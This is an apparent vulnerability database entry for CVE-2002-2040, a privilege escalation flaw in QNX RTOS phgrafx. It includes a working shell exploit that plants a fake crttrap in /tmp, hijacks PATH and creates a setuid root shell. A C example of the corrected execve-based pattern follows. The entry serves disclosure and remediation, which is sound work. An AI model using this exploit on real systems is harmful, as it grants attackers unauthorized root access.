QNX RTOS phgrafx Privilege Escalation Vulnerability

Vulnerability ID 1106762 Vulnerability type Access validation error
Published 2002-06-03 Updated 2005-10-20
CVE ID CVE-2002-2040
CNNVD-ID CNNVD-200212-857
Platform Linux CVSS score 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/21503
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-857
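|Vulnerability details
In QNX realtime operating system (RTOS) versions 4.25 and 6.1.0, the (1) phgrafx and (2) phgrafx-startup programs do not properly drop privileges before executing system commands. A local user can modify the PATH environment variable so that it references a malicious crttrap program, which results in execution of arbitrary commands.
|Exploit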
source: http://www.securityfocus.com/bid/4915/info

The QNX phgrafx utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges.

#!/bin/sh
#
# click advanced,done, apply, accept and done. 
# now you should have a setuid root shell waiting in /tmp/badc0ded
#
# www.badc0ded.com
echo "#!/bin/sh" > /tmp/crttrap
echo "cp /bin/sh /tmp/badc0ded" >> /tmp/crttrap
echo "chmod 4777 /tmp/badc0ded" >> /tmp/crttrap
echo "/usr/bin/crttrap $1 $2 $3 $4 $5 $6 $7 $8 $9 " >> /tmp/crttrap
chmod 755 /tmp/crttrap
export PATH="/tmp:$PATH"
/usr/photon/bin/phgrafx
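
The flaw described above is a privileged program calling a helper by bare name through system(), so the caller's PATH decides what runs as root. The following C sketch is an added example, not code from QNX or from the original advisory, and shows the corrected pattern: drop privileges, use an absolute path, and pass a fixed environment. The function names are hypothetical, and /bin/sh stands in for the helper so the demo runs anywhere (on the affected system the helper would be /usr/bin/crttrap, as in the script above).

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently give up set-uid/set-gid privileges. Returns 0 on success. */
static int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    /* Group first: after setuid() we may no longer be allowed to change it. */
    if (setgid(rgid) != 0 || setuid(ruid) != 0)
        return -1;
    /* An unprivileged caller must not be able to get root back. */
    if (ruid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

/* Hypothetical replacement for system("helper ..."): no shell parsing, no
 * PATH search, fixed environment. Returns the helper's exit status or -1. */
int run_helper_safely(const char *abs_path, char *const argv[])
{
    char *const clean_env[] = { "PATH=/bin:/usr/bin", NULL };
    int status;
    pid_t pid;

    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                          /* refuse names that need PATH */
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges() != 0)
            _exit(126);
        execve(abs_path, argv, clean_env);  /* execve never consults PATH */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Assumption: /bin/sh is a stand-in helper that reports what it sees. */
    char *argv[] = { "sh", "-c", "echo \"helper sees PATH=$PATH\"", NULL };
    setenv("PATH", "/tmp:/bin:/usr/bin", 1);   /* constructed hostile PATH */
    return run_helper_safely("/bin/sh", argv);
}
```

The helper reports PATH=/bin:/usr/bin even though the parent's PATH starts with /tmp, and a bare name such as crttrap is rejected before any process is created.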
|References

Source: BID
Name: 4916
Link: http://www.securityfocus.com/bid/4916
Source: BID
Name: 4915
Link: http://www.securityfocus.com/bid/4915
Source: XF
Name: qnx-rtos-phgrafx-privileges(9257)
Link: http://www.iss.net/security_center/static/9257.php
